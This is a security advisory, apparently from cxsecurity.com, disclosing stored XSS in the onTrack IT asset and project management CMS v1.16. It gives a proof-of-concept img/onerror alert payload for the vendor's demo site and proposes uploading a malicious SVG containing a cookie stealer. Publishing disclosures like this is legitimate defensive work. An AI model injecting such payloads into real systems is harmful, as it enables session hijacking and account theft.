onTrack - IT Asset Management & Project Management CMS v1.16 Stored XSS

2019.04.16
ru QUIXSS (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

«onTrack - IT Asset Management & Project Management» have no input field filtering, so we have a multiple XSS here. PoC: Go to the demo website http://demos.codeniner.com/ontrack/?route=signin and login as admin. Choose section u want, like «Clients», «Inventory», «Projects», «Knowledge Base», etc. etc. Any input field that u can find inside this system is vulnerable, so use any payload u want, f.e.: "><img src="x" onerror="alert('cxsecurity');"> and it will work. Plus, .SVG files upload are allowed, so you can upload an «evil» .SVG with cookie stealer inside, for example.

References:

https://codecanyon.net/item/ontrack-it-asset-management-project-management/14772352


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top